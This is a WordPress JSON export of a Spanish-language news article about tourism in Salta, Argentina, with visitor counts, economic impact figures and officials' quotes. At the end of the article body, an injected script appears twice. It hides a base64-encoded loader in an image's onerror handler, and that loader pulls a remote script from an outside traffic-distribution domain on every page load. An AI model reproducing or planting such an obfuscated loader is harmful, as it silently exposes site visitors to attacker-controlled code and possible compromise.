{"id":2746,"date":"2023-06-20T20:03:37","date_gmt":"2023-06-20T23:03:37","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2746"},"modified":"2025-08-14T00:14:43","modified_gmt":"2025-08-14T03:14:43","slug":"turistas-de-argentina-y-el-mundo-generaron-un-impacto-economico-de-casi-1500-millones","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2746","title":{"rendered":"Turistas de Argentina y el mundo generaron un impacto econ\u00f3mico de casi $1500 millones"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>A Salta llegaron m\u00e1s de 24 mil turistas de todo el pa\u00eds y de mercados internacionales durante el fin de semana extendido.<\/em><\/h4>\n\n\n\n<p>El pa\u00eds vivi\u00f3 un nuevo fin de semana extendido con los feriados del 17 de junio por un nuevo aniversario del fallecimiento del h\u00e9roe nacional Mart\u00edn Miguel de G\u00fcemes, el feriado puente del 19 y el del 20 de junio por el paso a la inmortalidad de Manuel Belgrano. Estas fechas coincidieron con la vigencia de la cuarta edici\u00f3n del programa de incentivo PreViaje IV, donde Salta fue la provincia m\u00e1s elegida por los turistas.<\/p>\n\n\n\n<p>De esta manera, entre el 17 y 19 de junio se registraron 24.987 turistas en establecimientos de alojamiento, generando un impacto econ\u00f3mico estimado en $1.469.210.002. Muchos de estos turistas participaron en actividades programadas en el Calendario G\u00fcemesiano, elaborado por el Ministerio de Turismo y Deportes de Salta y los municipios.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7599-turistas-de-argentina-y-el-mundo-generaron-un-impacto-economico-de-casi-1500-millones.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7599-turistas-de-argentina-y-el-mundo-generaron-un-impacto-economico-de-casi-1500-millones.jpg\" alt=\"Turistas de Argentina y el mundo generaron un impacto econ\u00f3mico de casi $1500 millones\" width=\"-417\" height=\"-278\"\/><\/a><\/figure><\/div>\n\n\n<p>Las localidades m\u00e1s concurridas fueron Cafayate, Ciudad de Salta, Cachi, San Antonio de los Cobres, San Lorenzo, Molinos, Rosario de la Frontera, Chicoana, Coronel Moldes y San Carlos, con una tasa neta de ocupaci\u00f3n tur\u00edstica provincial de 81,6%.<\/p>\n\n\n\n<p>Salta se prepara para la temporada de invierno, desde hace semanas se desarrolla una gira por los principales mercados en el marco de la campa\u00f1a Salta Alto Destino que se lanz\u00f3 oficialmente el 7 de junio en Galer\u00edas Pac\u00edficos de Buenos Aires, pero que ya pas\u00f3 por las ciudades de C\u00f3rdoba, Rosario, Santa Fe, Resistencia y Corrientes.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7600-turistas-de-argentina-y-el-mundo-generaron-un-impacto-economico-de-casi-1500-millones.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7600-turistas-de-argentina-y-el-mundo-generaron-un-impacto-economico-de-casi-1500-millones.jpeg\" alt=\"Turistas de Argentina y el mundo generaron un impacto econ\u00f3mico de casi $1500 millones\" width=\"259\" height=\"193\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cJunto al sector privado venimos trabajando para el crecimiento del sector tur\u00edstico en la provincia, lo que permite en Salta generar empleo genuino en las siete regiones tur\u00edsticas en tono con lo planteado en el plan estrat\u00e9gico Liderar\u201d, afirm\u00f3 el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a.<\/strong>&nbsp;Por otra parte, el funcionario inform\u00f3 que \u201cla gira de promoci\u00f3n Alto Destino alcanza los distintos mercados estrat\u00e9gicos de Salta, para continuar promocionando a la provincia\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7601-turistas-de-argentina-y-el-mundo-generaron-un-impacto-economico-de-casi-1500-millones.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7601-turistas-de-argentina-y-el-mundo-generaron-un-impacto-economico-de-casi-1500-millones.jpg\" alt=\"Turistas de Argentina y el mundo generaron un impacto econ\u00f3mico de casi $1500 millones\" width=\"292\" height=\"194\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cEl movimiento durante el fin de semana realmente fue excelente, muy bueno, en un fin de semana donde est\u00e1 vigente Previaje porque es alto el uso de la tarjeta de este programa por parte de los turistas para la compra de opcionales\u201d, se\u00f1al\u00f3 el presidente de la C\u00e1mara de Turismo de Salta,&nbsp;<strong>Gustavo Di M\u00e9cola<\/strong>. \u201cCon el sector p\u00fablico venimos trabajando en toda la provincia y es para destacar el posicionamiento de destinos emergentes, que surgen como oportunidades para inversiones privadas\u201d, finaliz\u00f3.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/turistas-de-argentina-y-el-mundo-generaron-un-impacto-economico-de-casi-1500-millones-90257\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>A Salta llegaron m\u00e1s de 24 mil turistas de todo el pa\u00eds y de mercados internacionales durante el fin de semana extendido. El pa\u00eds vivi\u00f3 un nuevo fin de semana extendido con los feriados del 17 de junio por un nuevo aniversario del fallecimiento del h\u00e9roe nacional Mart\u00edn Miguel de G\u00fcemes, el feriado puente del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2747,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-2746","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2746"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2746"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2746\/revisions"}],"predecessor-version":[{"id":7053,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2746\/revisions\/7053"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2747"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2746"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2746"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2746"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}